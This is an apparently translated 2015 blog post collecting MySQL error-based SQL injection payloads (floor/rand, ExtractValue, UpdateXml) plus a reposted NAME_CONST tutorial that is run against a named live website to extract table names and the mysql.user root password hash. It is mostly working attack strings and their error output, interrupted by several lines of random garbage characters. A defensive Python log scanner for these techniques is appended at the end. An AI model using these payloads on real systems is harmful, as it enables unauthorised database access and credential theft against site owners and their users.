MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() call with the subquery you need.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


More collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

& G) d( _/ Y0 O. e  k
4 e% J3 a1 \  @* N; B
: S1 j7 c# u! h/ s& M) u
0 F/ V! r" ~4 j5 l( ~+ Q+ y8 Z4 l
4 ~7 h1 l" Y  ~! {' M
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

: U' P% K$ b6 Y! `7 n4 C0 M
) D: X2 b3 e8 N/ H+ [9 h# Z* _" L8 s/ m

" U! V1 q0 ~% O, ^# R; Y1 S

( h6 Z5 X& t; D/ C8 G4 a% J
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
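Added example, not part of the post or of the quoted NAME_CONST tutorial: a small Python scanner that flags, in web-server access logs, the request signatures of the four error-based techniques covered above (floor/rand with GROUP BY, ExtractValue, UpdateXml, NAME_CONST) and, in response bodies, the exact error strings each technique leaks (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name). The log lines are constructed; only the request path of the site quoted in the post is reused.

```python
import re
from urllib.parse import unquote_plus

# Call signatures of the ExtractValue, UpdateXml and NAME_CONST techniques,
# matched against the URL-decoded, lower-cased request.
FUNCTION_SIGNATURES = {
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "updatexml":    re.compile(r"updatexml\s*\("),
    "name_const":   re.compile(r"name_const\s*\("),
}

# Error text each technique leaks into the page, taken from the error lines
# quoted in the post; an outbound filter should never let these reach a client.
RESPONSE_SIGNATURES = {
    "floor":      re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath":      re.compile(r"XPATH syntax error: '"),
    "name_const": re.compile(r"Duplicate column name '"),
}

def classify_request(url):
    """Return the error-based techniques whose signature the request carries."""
    decoded = unquote_plus(url).lower()   # '+' -> space, %xx -> char
    hits = []
    # floor(): rand() inside floor() together with a GROUP BY (Method 1 and Method 2)
    if re.search(r"floor\s*\(\s*rand\s*\(", decoded) and re.search(r"group\s+by", decoded):
        hits.append("floor")
    hits += [name for name, rx in FUNCTION_SIGNATURES.items() if rx.search(decoded)]
    return hits

def classify_response(body):
    """Return the leaked-error signatures present in a response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]

# Constructed access-log sample (not from the post): one benign request, two probes.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /qcwh/content/detail.php?id=330&sid=19 HTTP/1.1" 200 5120
10.0.0.6 - - [11/Nov/2015:19:04:01 +0800] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 210
10.0.0.7 - - [11/Nov/2015:19:04:15 +0800] "GET /qcwh/content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user())))-- HTTP/1.1" 500 180
"""

def scan_log(log):
    """Return (client_ip, techniques) for each log line whose request path matches."""
    hits = []
    for line in log.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if m and (techniques := classify_request(m.group(1))):
            hits.append((line.split()[0], techniques))
    return hits
```

Matching requests are the detection side; the response signatures are the reason to disable verbose database errors in production and to use parameterized queries, which removes the error channel these payloads depend on.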
